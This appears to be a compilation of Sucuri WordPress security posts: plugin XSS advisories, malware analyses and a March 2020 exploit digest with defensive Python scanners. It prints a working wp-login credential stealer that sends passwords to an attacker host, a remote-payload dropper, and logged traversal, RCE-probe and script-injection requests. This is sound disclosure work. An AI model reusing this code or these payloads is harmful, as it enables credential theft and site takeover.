Unauthenticated Stored Cross Site Scripting in WP Product...


Exploitation Level: Very Easy / Remote

DREAD Score: 7.4

Vulnerability: Persistent Cross-site Scripting

Patched Version: 3.7.6


During a routine research audit for our Sucuri Firewall, we discovered an Unauthenticated Persistent Cross-Site Scripting (XSS) affecting 40,000+ users of the WP Product Review plugin.

Current State of the Vulnerability

Though this security bug was fixed in the 3.7.6 release, older versions can be exploited by an attacker without any account in the vulnerable site. We are not aware of any exploit attempts currently using this vulnerability.

Disclosure / Response Timeline:

  • May 13, 2020: Initial contact.
  • May 14, 2020: Patch is live.

Technical Details

All user input is sanitized, but the WordPress sanitization function used can be bypassed when the parameter is placed inside an HTML attribute. A successful attack results in malicious scripts being injected into all of the site's products.


Update as Soon as Possible

Unauthenticated attacks are very serious because they can be automated, making it easy for hackers to mount successful, widespread attacks against vulnerable websites. The number of active installs, the ease of exploitation, and the effects of a successful attack are what makes this vulnerability particularly dangerous.

To protect against this vulnerability, we strongly encourage WP Product Review users to update their plugin to version 3.7.6 as soon as possible. Users that are unable to update immediately can leverage the Sucuri Firewall or equivalent technology to virtually patch the vulnerability.

WordPress Admin Login Stealer

During an investigation, we identified a WordPress login stealer using the PHP functions curl and file_get_contents. The malicious code was injected into the core file wp-login.php to intercept the information of a valid user and send it to the attacker.

The script gathers the site URL, IP, username and password details, then sends them to the remote site via curl.

$url="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$ip=$_SERVER['REMOTE_ADDR'];
// The base64 literal decodes to the attacker's collection URL (shown below); the visitor IP,
// site URL and the submitted username/password are appended to it base64-encoded.
$ccc_url=base64_decode("aHR0cDovLzEuc2FsZWZvcnlvdS5vcmcvdG9uZy9wYS9uZXdwdy9wYXNzLnBocD9hZG1pbmlwPQ").base64_encode($ip)."&host=".base64_encode($url)."&name=".base64_encode($_POST['log'])."&password=".base64_encode($_POST['pwd']);
// First exfiltration attempt via file_get_contents(); the @ suppresses any error output.
$ccc=@file_get_contents($ccc_url);
if(empty($ccc)){
    // Fallback: if the first request returned nothing, the same URL is requested with curl.
    function get_pass_Html($url){
        $ch = curl_init();
        curl_setopt ($ch, CURLOPT_URL, $url);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 1);
        curl_setopt ($ch, CURLOPT_TIMEOUT, 2);
        curl_exec($ch);
        curl_close($ch);
        return true;
    }
    get_pass_Html($ccc_url);
}
// Marker cookie set in the victim's browser for one year.
setcookie("whatsup","whatsupman",time()+3600*24*365);

Further analysis reveals that the base64 encoded string in this malicious script is actually the attacker’s URL:

hxxp://1[.]saleforyou[.]org/tong/pa/newpw/pass.php?adminip=

Here is the information sent via curl:

hxxp://1[.]saleforyou[.]org/tong/pa/newpw/pass.php?adminip=$ip&host=$url&name=$_POST['log']&password=$_POST['pwd']

Malware Variants & Sub-Domains

This login stealing malware appears to have been distributed and used on other websites for about a year now. The same top-level domain has also been seen in other malware variations, but uses a different subdomain: 5[.]saleforyou[.]org

GET_Html('http://5[.]saleforyou[.]org/ming/exam/main.php?key='.$_GET['exam']."&host=".$_SERVER['HTTP_HOST']."&www=".$www);

Another variation also appears to be collecting server IP and HTTP_HOST using a different URL on the same domain:

curl_init();
$timeout = 5;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$content = curl_exec($ch);
curl_close($ch);
}
return $content;
}
$jturl = "http://1[.]saleforyou[.]org/tong/get/htc/1.php?adminip=".$server_ip."&host=".$_SERVER['HTTP_HOST'];

  • saleforyou[.]org. 300 IN A 23.88.229.79 \ Enzu Inc.
  • 1.saleforyou[.]org. 300 IN A 172.246.126.170 \ Enzu Inc.
  • 2.saleforyou[.]org. 300 IN A 192.157.233.59 \ Enzu Inc.
  • 3.saleforyou[.]org. 300 IN A 192.157.233.176 \ Enzu Inc.
  • 4.saleforyou[.]org. 300 IN A 23.89.201.143 \ Enzu Inc.
  • 5.saleforyou[.]org. 300 IN A 144.208.127.115 \ Shock Hosting LLC
  • 6.saleforyou[.]org. 300 IN A 208.123.119.189 \ Shock Hosting LLC

It looks like Enzu Inc. has a long history of facilitating malware, spam, and general abuse; their IPs are listed in Stop Badware's top 50 lists.

Each subdomain is being used for a different campaign, with some hosted on different servers — and even different datacenters.

Related Domains

Another domain, bingstyle[.]com, appears to be related. Attackers are using a similar URL structure for malicious files: tong/pa/pass.php

  • bingstyle[.]com. 300 IN A 104.31.70.141
  • bingstyle[.]com. 300 IN A 104.31.71.141

These Virustotal results suggest a relationship to saleforyou[.]org, or at least the same group: https://www.virustotal.com/gui/domain/bingstyle.com/relations

Unfortunately, bingstyle[.]com is using CloudFlare and we are unable to tell exactly where it's hosted.

Mitigation Steps

Login credential stealers like this one can easily be used as a backdoor to maintain unauthorized access to a website long after the initial infection. The malicious script will simply continue to send the stolen login credentials to the attacker until it is removed from the compromised environment.

To catch these types of infections, set up and maintain a file monitoring system to alert you to any changes in your core WordPress files and detect malicious activity along with other indicators of compromise.

Fake M-Shield WordPress Plugin

During a recent malware investigation, we found a fake WordPress plugin called M-Shield. We also found almost an identical plugin under the name kingof, with malicious code hosted in the file: ./wp-content/plugins/kingof/kingof.php

Based on the patterns commonly used for malware droppers, we suspect that this same plugin is circulating with a variety of different names. Since neither the M-Shield nor the kingof plugins exist in the official WordPress repository, the malicious component was most likely injected into the WordPress website after the initial compromise.

The plugin code loops through an array of "random" files and checks whether each one exists with a filesize of at least 1000 bytes. If not, the script downloads the malicious wsos.txt file from 24hod[.]sk using the function file_get_contents() and writes its contents into the files listed in the $amb array.

<?php
function shield_01()
{
    // Files the dropper expects to own; each is (re)written when missing or smaller than 1000 bytes.
    $amb = array('wp-pwd.php', 'wp-shield.php', 'wp-logout.php', 'wp-config-proto.php', 'wp-content/themes/ms.cache.php');
    foreach($amb as $f) {
        $f=ABSPATH.$f;
        if(!file_exists($f)||filesize($f)<1000) {
            // $wsd is unset on the first pass, so the remote payload is fetched once and reused.
            if(!$wsd)
                $wsd = file_get_contents('hxxp://www[.]24hod[.]sk/colours/layout/wsos.txt');
            if($wsd)
                file_put_contents($f,$wsd);
        }
    }
}

Once the malicious payload has been delivered, the plugin uses two different methods to execute the malware.

First, the malware leverages a WordPress function called add_action() that attempts to run shield_01() when the init hook is executed. If the function add_action() doesn’t exist, the malicious code calls shield_01() directly.

if(function_exists('add_action')){
    add_action( 'init', 'shield_01');
}else{
    shield_01();
}

It’s important to note that attackers can leverage plugin vulnerabilities and other malicious code even if a plugin is deactivated in your WordPress environment.

We highly recommend regularly auditing your plugins and themes and removing any unknown or unused components from your website. Our free guides offer more WordPress security hardening tips to help you secure your environment.

Fake License.txt File Loaded Through PHP Include

Our team recently found a malicious injection located within a PHP include. The redirect occurs via the include function, which includes a file inconspicuously named license.txt.

During our investigation, we located the license.txt include injected within the header.php file of the WordPress theme.

include('license.txt'); ?>
        </header> <!-- #main-header -->
    <?php
        $main_header = ob_get_clean();

        /**
         * Filters the HTML output for the main header.
         *
         * @since ??
         *
         * @param string $main_header
         */
        echo apply_filters( 'et_html_main_header', $main_header );
    ?>
        <div id="et-main-area">
    <?php
        /**
         * Fires after the header, before the main content is output.
         *
         * @since ??
         */
        do_action( 'et_before_main_content' );

The license.txt file is essentially a redirect: it uses HTML and JavaScript to send site visitors to the malicious website https://times2day[.]com, a domain registered on February 6th, 2020.

<?php
<html>
<meta http-equiv="X-UA-Compatible"
content="IE-Edge">
   <meta name="viewport" content="width=device-width,
initial scale=1">
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.all.min.js"></script>
   <link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.min.css'>
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js">
   </script>
   <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js">
    </script>
   <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
</head>
<body>
<script>
swal({
    title: 'Oh, you must be visiting us!!!! ',
    text: 'Getting access..... ',
    icon: 'success',
    timer: 2000,
    buttons: false,
})
.then(() => {
    window.location.href = "https://times2day.com/";
})
</script>
</body>
</html>

?>

To detect these types of malicious injections, site owners can scan websites for known malware, blacklisting status, website errors, out-of-date software, and malicious code.
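The three injections described above (the wp-login.php credential stealer, the M-Shield/kingof dropper and the license.txt include) share source-level traits that a file scan can key on. The following is an added Python example, written here and not part of the original posts or any Sucuri tool; the rule names, placeholder hosts and base64 literal are ours, and it is meant to complement, not replace, integrity monitoring of core files.

```python
import re

# Indicator rules distilled from the three injections above; each is matched against
# the source text of one PHP file. The labels are our own.
RULES = [
    ("login stealer: submitted credentials encoded for an outbound request",
     re.compile(r"base64_encode\(\s*\$_POST\[\s*['\"](?:log|pwd)['\"]\s*\]")),
    ("obfuscated URL: base64_decode() of a long literal concatenated into a string",
     re.compile(r"base64_decode\(\s*['\"][A-Za-z0-9+/=]{16,}['\"]\s*\)\s*\.")),
    ("include/require of a non-PHP file (license.txt style loader)",
     re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"][^'\"]*\.(?:txt|ico|jpg|png|gif)['\"]", re.I)),
]
REMOTE_FETCH = re.compile(r"file_get_contents\(\s*['\"]https?://", re.I)

def scan_php_source(source):
    """Return the list of indicator names that fire on one file's source text."""
    hits = [name for name, pattern in RULES if pattern.search(source)]
    # The dropper fetches a remote payload and writes it to local files. Either call
    # alone is common in legitimate code; the pair in one file is the signal.
    if REMOTE_FETCH.search(source) and "file_put_contents(" in source:
        hits.append("dropper: remote payload fetched and written to disk")
    return hits

def scan_tree(files):
    """files maps a path to its source; only paths with findings are returned."""
    report = {}
    for path, source in files.items():
        hits = scan_php_source(source)
        if hits:
            report[path] = hits
    return report

# Constructed samples modelled on the snippets above. Hosts are placeholders and the
# base64 literal is filler, not the real collection URL.
SAMPLES = {
    "wp-login.php": r'''$ip=$_SERVER['REMOTE_ADDR'];
$u=base64_decode("cGxhY2Vob2xkZXIgZm9yIGEgYzIgdXJs").base64_encode($ip)."&name=".base64_encode($_POST['log'])."&password=".base64_encode($_POST['pwd']);
$c=@file_get_contents($u);''',
    "wp-content/plugins/kingof/kingof.php": r'''foreach($amb as $f){ $f=ABSPATH.$f;
  if(!$wsd) $wsd = file_get_contents('http://placeholder.invalid/wsos.txt');
  if($wsd) file_put_contents($f,$wsd); }''',
    "wp-content/themes/example/header.php": r'''<?php include('license.txt'); ?><header id="main-header">''',
    "wp-content/themes/example/footer.php": r'''<?php get_footer(); include_once('inc/helpers.php'); ?>''',
}

if __name__ == "__main__":
    for path, hits in scan_tree(SAMPLES).items():
        print(path, "->", "; ".join(hits))
```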

Face Mask Spam Links Injected in WordPress Database

During a recent malware removal request, we found a compromised WordPress site being used to redirect to spam websites. The campaign was leveraging an increase in search queries related to face masks.

To make their campaign more difficult to detect and boost SEO rankings, the attackers use a multitude of compromised third-party websites to funnel their traffic. They also use the World Health Organization name and images to add credibility to their campaign.

[Image: World Health Organization spam image]

Spam links are injected into the widgets section of the wp_options database, resulting in the compromised environment linking to third-party sites trying to rank for face mask search terms.

[Image: Face mask spam links]

The spam links have been set to conceal themselves from website visitors using <div style="display:none;">, all of which lead to the Shopify website https://lundybright[.]fr/ which was registered on March 2nd.
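Because the injected HTML lives inside a serialized wp_options value rather than in a file, a quick way to hunt for it is to feed each option value to an HTML parser and collect links that sit under an element styled display:none. This is an added Python example written for this page, not a Sucuri tool; the widget value is constructed with placeholder domains, and its serialized string length is not recomputed.

```python
import re
from html.parser import HTMLParser

VOID_TAGS = {"br", "img", "hr", "input", "meta", "link", "source", "wbr"}
HIDDEN_STYLE = re.compile(r"display\s*:\s*none", re.I)

class HiddenLinkFinder(HTMLParser):
    """Collects hrefs of <a> tags that sit inside an element styled display:none."""
    def __init__(self):
        super().__init__()
        self.open_hidden = []   # one bool per open non-void element: is it hidden?
        self.links = []         # concealed links
        self.visible_links = [] # everything else, kept for comparison
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        hidden = bool(HIDDEN_STYLE.search(attrs.get("style") or ""))
        if tag == "a" and attrs.get("href"):
            target = self.links if (hidden or any(self.open_hidden)) else self.visible_links
            target.append(attrs["href"])
        if tag not in VOID_TAGS:   # void elements never get an end tag
            self.open_hidden.append(hidden)
    def handle_endtag(self, tag):
        if self.open_hidden:
            self.open_hidden.pop()

def find_hidden_links(option_value):
    """Scan one raw wp_options value. The PHP serialization framing around the widget
    text contains no tags, so the parser simply treats it as text."""
    finder = HiddenLinkFinder()
    finder.feed(option_value)
    return finder.links

# Constructed widget_text value shaped like a real wp_options row (placeholder domains).
SAMPLE_OPTION = ('a:2:{i:2;a:3:{s:5:"title";s:0:"";s:4:"text";s:999:"'
    '<p>Welcome! Read our <a href="https://example.invalid/about">story</a>.</p>'
    '<div style="display:none;"><p>Buy <a href="https://spam-one.invalid/masks">N95 masks</a>'
    ' and <a href="https://spam-two.invalid/">face masks</a> <img src="who.png"></p></div>'
    '";s:6:"filter";b:0;}s:12:"_multiwidget";i:1;}')

if __name__ == "__main__":
    print(find_hidden_links(SAMPLE_OPTION))
```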

Compromised websites impacted by this spam campaign can use our hacked website cleanup guide to remove the infection.

Vulnerabilities Digest: March 2020

Fixed Plugins and Vulnerabilities

Plugin                             | Vulnerability                          | Patched Version | Installs
-----------------------------------|----------------------------------------|-----------------|---------
Cookiebot                          | Reflected Cross-Site Scripting         | 3.6.1           | 40000
Data Tables Generator By Supsystic | Authenticated Stored XSS               | 1.9.92          | 30000
WPvivid Backup                     | Database Leak                          | 0.9.36          | 40000
Advanced Ads                       | Reflected XSS                          | 1.17.4          | 100000
Category Page Icons                | Arbitrary File Upload/Deletion         | 0.9.1           | Closed
Cookiebot                          | Reflected Cross-Site Scripting         | 3.6.1           | 40000
Custom Post Type UI                | CSRF to Stored XSS                     | 1.7.4           | 800000
Fruitful                           | Authenticated Stored XSS               | 3.8.2           | 9000
responsive-add-ons                 | Unprotected AJAX Endpoints             | 2.2.6           | 40000
Import Export WordPress Users      | Authenticated Arbitrary User Creation  | 1.3.9           | 30000
LearnPress                         | Privilege Escalation                   | 3.2.6.7         | 70000
Multiple Plugins                   | Unauthenticated RCE via PHPUnit        | all             | -
Multiple WebToffee Plugins         | CSRF                                   | 1.3.3           | 2000
Popup Builder                      | Multiple Issues                        | 3.64.1          | 100000
Viral Optins                       | Arbitrary File Upload                  | all             | closed
WordPress File Upload              | Directory Traversal to RCE             | 4.13.0          | 20000
WPML                               | Cross Site Request Forgery to RCE      | 4.3.7           | 30000


Highlights for March 2020

Cross-site scripting and cross-site request forgery vulnerabilities were most prevalent this month. Attackers took advantage of the lack of restrictions in critical functions and of issues surrounding user input sanitization.

Ongoing Campaign Targets Plugin Vulnerabilities

An ongoing malicious campaign that we’ve been actively tracking since early 2019 continues targeting new plugin vulnerabilities to inject malicious domains.

Malicious domain injected during this month: clon[.]collectfasttracks[.]com

Social Metrics Tracker

185.50.197.12 - --3e87eee3d[...]script type=text/javascript src='https://clon.collectfasttracks.com/hos?&v5'></script>\x0D\x0A--3e87eee3d99c55ee9a39a59184ff3f05905a195557207837f3015d906347--\x0D\x0A [15/Mar/2020:19:55:14 +0000] "POST /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1&section=gapi HTTP/1.1"

Simple Fields

185.50.197.12 - --3e87eee3d[...]script type=text/javascript src='https://clon.collectfasttracks.com/hos?&v5'></script>\x0D\x0A--3e87eee3d99c55ee9a39a59184ff3f05905a195557207837f3015d906347--\x0D\x0A [15/Mar/2020:19:55:14 +0000] "POST /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1&section=gapi HTTP/1.1"

Pricing Table by Supsystic

 185.212.128.162 - - [18/Mar/2020] "GET /wp-admin/admin-ajax.php?action=getJSONExportTable&tables[]=8&reqType=ajax&mod=tables&pl=pts HTTP/1.1" 

Brizy – Page Builder

207.180.198.200 - - [12/Mar/2020] "GET /wp-content/plugins/brizy/admin/site-settings.php HTTP/1.1" 

WP Security Audit Log

207.180.198.200 - - [12/Mar/2020] "GET /wp-content/plugins/brizy/admin/site-settings.php HTTP/1.1" 

WordPress WP User Frontend

185.219.168.18 - - [17/Mar/2020] "GET /wp-admin/admin-ajax.php?action=wpuf_file_upload HTTP/1.1"

Adblock Blocker

185.219.168.18 - --0747fb1e8d3cfc0d658e7a77f51c7758\x0D\x0AContent-Disposition: form-data; name=\x22popimg\x22; filename=\x22settings_auto.php\x22\x0D\x0A\x0D\x0A[...] echo \x22not exits\x22;\x0D\x0Aecho \x22done .\x5Cn \x22 ;\x0D\x0A\x0D\x0A@unlink(__FILE__);\x0D\x0A?>\x0D\x0A\x0D\x0A--0747fb1e8d3cfc0d658e7a77f51c7758--\x0D\x0A [17/Mar/2020:13:25:45 +0000] "POST /wp-admin/admin-ajax.php?action=getcountryuser&cs=2 HTTP/1.1" 

Multiple Plugins - Access to Sensitive Files

113.162.159.230 -- GET -- /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F..%2F..%2F&filename=wp-config.php&action=download -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/themes/ctu/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/themes/ctu/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/themes/ctu/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23

Multiple Plugins Affected by an Old Vulnerability in PHPUnit

As seen in January, attackers continue to leverage an RCE in PHPUnit along with several plugin vulnerabilities found in the past month.

Unpatched versions of PHPUnit prior to 4.8.28 and 5.6.3 allow remote attackers to execute arbitrary PHP code via HTTP POST data.

Jekyll-exporter

118.27.25.88 - <?php  echo 'RCE_VULN|'; echo php_uname();?> [13/Mar/2020] "POST //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1"

Wp-heyloyalty

118.27.5.203 - <?php  echo 'RCE_VULN|'; echo php_uname();?> [12/Mar/2020] "POST //wp-content/plugins/wp-heyloyalty/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1"
[...]
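The request shapes logged above (POSTs to PHPUnit's eval-stdin.php, encoded ../ traversals ending in wp-config.php, and admin-ajax.php calls to the abused plugin actions) are easy to pick out of an access log with a few rules. The following Python triage script is an added example written for this page, not Sucuri code; the log lines are constructed in combined format with RFC 5737 test addresses, reusing only the request paths shown above, and the labels and action list are ours.

```python
import re
from urllib.parse import parse_qsl, unquote

# Combined-log-format line: IP, two dash fields, [timestamp], "METHOD target PROTO" ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

# admin-ajax actions seen in the exploit attempts logged above.
WATCHED_AJAX_ACTIONS = {"getJSONExportTable", "wpuf_file_upload", "getcountryuser"}
PHPUNIT_EVAL = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"

def classify_request(method, target):
    """Return a label for a suspicious request target, or None for ordinary traffic."""
    path, _, query = target.partition("?")
    decoded = unquote(unquote(target))  # undo single and double URL-encoding of ../
    if method == "POST" and path.endswith(PHPUNIT_EVAL):
        return "phpunit-eval-stdin"
    if "../" in decoded and "wp-config.php" in decoded:
        return "wp-config-traversal"
    if path.endswith("/wp-admin/admin-ajax.php"):
        action = dict(parse_qsl(query)).get("action", "")
        if action in WATCHED_AJAX_ACTIONS:
            return "plugin-ajax-probe:" + action
    return None

def triage(log_text):
    """Return (ip, label) for each line that matches a rule; unparsable lines are skipped."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify_request(m["method"], m["target"])
        if label:
            findings.append((m["ip"], label))
    return findings

# Constructed log lines; the third one is double-encoded to exercise the decode step.
SAMPLE_LOG = """\
198.51.100.7 - - [13/Mar/2020:10:01:02 +0000] "POST //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 128
198.51.100.8 - - [23/Mar/2020:11:12:13 +0000] "GET /wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 2710
198.51.100.8 - - [23/Mar/2020:11:12:14 +0000] "GET /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%252F..%252F&filename=wp-config.php&action=download HTTP/1.1" 404 0
198.51.100.9 - - [17/Mar/2020:13:25:45 +0000] "GET /wp-admin/admin-ajax.php?action=wpuf_file_upload HTTP/1.1" 200 55
203.0.113.5 - - [17/Mar/2020:13:30:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 9001
"""

if __name__ == "__main__":
    for ip, label in triage(SAMPLE_LOG):
        print(ip, label)
```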

Detected IPs

Public exploits already exist for all of the components listed above. We strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.

Reflected XSS in Cookiebot Administrative Page

A reflected XSS vulnerability has recently been found in the Cookiebot plugin, impacting a user base of over 40k installs. Versions prior to 3.6.1 are susceptible to this attack, which allows hackers to exploit the vulnerability found on administrative pages.

This vulnerability is caused by the manual tabs mechanism, which tries to add a class to the form with the current tab.

<?php if ( isset( $_GET['tab'] ) ) {
     $active_tab = $_GET['tab'];
} else if ( $active_tab == 'unavailable_addons' ) {
     $active_tab = 'unavailable_addons';
} else {
     $active_tab = 'available_addons';
} ?>

// ...

<form method="post" action="options.php" class="<?php echo $active_tab; ?>">

The issue lies in the fact that only two tab types should be present: available_addons or unavailable_addons. These values are never checked, however, and are directly inserted into the form class attribute.

This improper implementation leads to the potential for a reflected cross-site scripting attack which relies on human behavior, such as an administrator visiting a link. If the website administrator visits an attacker's specially crafted URL, the bad actor may be able to compromise and take over the website.
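Both this Cookiebot bug and the WP Product Review issue at the top of the page come down to the same context mismatch: a value that is only tag-stripped (or not checked at all) is placed inside a quoted HTML attribute, where a quote character, not a tag, is what matters. The following Python is an added example written for this page, not the plugin's code: strip_tags_sanitize is our stand-in for a tag-stripping WordPress sanitizer, html.escape(quote=True) mirrors what esc_attr() does, and the probe value is a harmless attribute, not a script.

```python
import re
import html
from html.parser import HTMLParser

# The only two tab names the Cookiebot admin page is meant to accept (from the advisory).
ALLOWED_TABS = ("available_addons", "unavailable_addons")
FORM = '<form method="post" action="options.php" class="%s">'

def strip_tags_sanitize(value):
    """Stand-in for a tag-stripping text sanitizer (assumption: it removes <...>
    markup but leaves quote characters alone, which is all the bypass needs)."""
    return re.sub(r"<[^>]*>", "", value)

def render_naive(tab):
    # The vulnerable shape: the request value lands in a quoted attribute after tag
    # stripping only, so a double quote inside it closes the attribute early.
    return FORM % strip_tags_sanitize(tab)

def render_escaped(tab):
    # Attribute-context escaping (what esc_attr() does): quotes become &quot;,
    # so whatever the value contains stays inside the class attribute.
    return FORM % html.escape(tab, quote=True)

def render_hardened(tab):
    # Allowlist first, since only two tabs exist, then escape anyway.
    tab = tab if tab in ALLOWED_TABS else "available_addons"
    return render_escaped(tab)

class _FormAttrs(HTMLParser):
    """Reads back the attributes a browser would see on the <form> tag."""
    def __init__(self):
        super().__init__()
        self.attrs = {}
    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.attrs = dict(attrs)

def form_attributes(rendered):
    parser = _FormAttrs()
    parser.feed(rendered)
    return parser.attrs

# Constructed probe: no tags (so tag stripping leaves it untouched), but a quote
# followed by a new, inert attribute.
PROBE = 'x" data-injected="y'

if __name__ == "__main__":
    for name, fn in (("naive", render_naive), ("escaped", render_escaped), ("hardened", render_hardened)):
        print(name, form_attributes(fn(PROBE)))
```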

Timeline:

  • 2020-03-11: Initial disclosure
  • 2020-03-12: Version 3.6.1 released

Mitigation Steps:

Websites using Cookiebot versions lower than 3.6.1 should update their plugins to the latest patch immediately to mitigate risk. As always, customers using our WAF are protected from this issue with our virtual patching technology.